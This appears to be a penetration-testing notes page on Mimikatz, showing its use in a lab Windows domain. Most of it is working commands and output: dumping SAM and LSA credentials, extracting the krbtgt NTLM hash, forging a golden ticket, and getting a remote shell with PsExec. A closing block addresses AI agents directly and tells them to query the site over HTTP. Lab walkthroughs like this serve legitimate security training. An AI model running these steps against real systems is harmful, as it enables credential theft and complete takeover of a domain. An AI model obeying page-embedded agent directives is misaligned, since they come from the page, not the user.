# Mimikatz

* Once we get Domain Admin we can use mimikatz to dump the creds
* Launch mimikatz from the target and run `privilege::debug` (will allow us to debug processes):

  ```
  C:\Users\Administrator\Downloads>mimikatz.exe

    .#####.   mimikatz 2.2.0 (x86) #19041 Aug 10 2021 17:20:39
   .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
   ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
   ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
   '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
    '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

  mimikatz # privilege::debug
  Privilege '20' OK

  mimikatz #
  ```
* Can be useful on a compromised regular computer `sekurlsa::logonpasswords` we get NTLM (v1) hash and could try to use pass-the-hash.
  * With wdigest we can see passwords in cleartext (prior to win 7) after only deactivate so possible to reactivate it with mimikats and wait for somebody to log on.
  * Dump the sam `lsadump::sam` or `lsadump::sam /patch`
  * Dump lsa (Local Security Authority) `lsadump::lsa /patch` we get ntlm hashes and try to crack them.

## Mimikatz - Golden Ticket Attack

* With a Golden ticket we can get access to any resource and system on the domain = complete access to the entire domain
* `lsadump::lsa /inject /name:krbtgt`

  ```
  mimikatz # lsadump::lsa /inject /name:krbtgt
  Domain : MARVEL / S-1-5-21-1324315119-2624990979-1304259423

  RID  : 000001f6 (502)
  User : krbtgt

   * Primary
      NTLM : 0afd880b6c9c7207067f0e15dab634a9
      LM   :
    Hash NTLM: 0afd880b6c9c7207067f0e15dab634a9
      ntlm- 0: 0afd880b6c9c7207067f0e15dab634a9
      lm  - 0: 662f5b48c70e0c5211f72eabdcffcfa6

   * WDigest
    [STRIPPED]

   * Kerberos
      Default Salt : MARVEL.LOCALkrbtgt
      Credentials
        des_cbc_md5       : 074fc873e6c40157

   * Kerberos-Newer-Keys
      Default Salt : MARVEL.LOCALkrbtgt
      Default Iterations : 4096
      Credentials
        aes256_hmac       (4096) : e5755cc451bc84fbe6004005f363e0425838d134306ffb0cb3a2f323e02a8ac9
        aes128_hmac       (4096) : a14075bef6022520025c4054880073a2
        des_cbc_md5       (4096) : 074fc873e6c40157

   * NTLM-Strong-NTOWF
      Random Value : 97decc0bc95a167ce7ebc2dd728fb83a
  ```
* Take note of:
  * Domain SID: `S-1-5-21-1324315119-2624990979-1304259423`
  * NTLM Hash of krbtgt: `0afd880b6c9c7207067f0e15dab634a9`
* Pass the ticket: `kerberos::golden /User:AnyDoesNotNeedToExist /domain:marvel.local /sid:S-1-5-21-1324315119-2624990979-1304259423 /krbtgt:0afd880b6c9c7207067f0e15dab634a9 /id:500 /ptt`

```
 mimikatz # kerberos::golden /User:AnyDoesNotNeedToExist /domain:marvel.local /sid:S-1-5-21-1324315119-2624990979-1304259423 /krbtgt:0afd880b6c9c7207067f0e15dab634a9 /id:500 /ptt
User      : AnyDoesNotNeedToExist
Domain    : marvel.local (MARVEL)
SID       : S-1-5-21-1324315119-2624990979-1304259423
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 0afd880b6c9c7207067f0e15dab634a9 - rc4_hmac_nt
Lifetime  : 2/12/2022 10:32:39 AM ; 2/10/2032 10:32:39 AM ; 2/10/2032 10:32:39 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'AnyDoesNotNeedToExist @ marvel.local' successfully submitted for current session
```

* Get a cmd prmpt using the session and golden ticket `misc::cmd`
* We can access to anything on the network:

  ```
  C:\Users\Administrator\Downloads>dir \\THEDEFENDER\c$
   Volume in drive \\THEDEFENDER\c$ has no label.
   Volume Serial Number is 22E3-F05A

   Directory of \\THEDEFENDER\c$

  12/07/2019  01:14 AM    <DIR>          PerfLogs
  01/28/2022  02:29 PM    <DIR>          Program Files
  10/06/2021  05:58 AM    <DIR>          Program Files (x86)
  01/28/2022  04:33 PM    <DIR>          Share
  02/12/2022  05:34 AM    <DIR>          Users
  02/04/2022  01:19 PM    <DIR>          Windows
                 0 File(s)              0 bytes
                 6 Dir(s)  42,889,506,816 bytes free

  C:\Users\Administrator\Downloads>
  ```
* We can then use [psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) to get a shell on a machine from the network
  * We download psexec on our compromised machine
  * We get the shell

    ```
    C:\Users\Administrator\Downloads\PSTools>PsExec.exe \\THEDEFENDER cmd.exe

    PsExec v2.34 - Execute processes remotely
    Copyright (C) 2001-2021 Mark Russinovich
    Sysinternals - www.sysinternals.com


    Microsoft Windows [Version 10.0.19044.1288]
    (c) Microsoft Corporation. All rights reserved.

    C:\Windows\system32>hostname
    THEDEFENDER
    ```

## Mimikatz - Resources

{% embed url="<https://github.com/gentilkiwi/mimikatz>" %}
Mimikatz
{% endembed %}

{% embed url="<https://github.com/gentilkiwi/mimikatz/wiki>" %}
Mimikatz - Wiki
{% endembed %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://csbygb.gitbook.io/pentips/tools/mimikatz.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.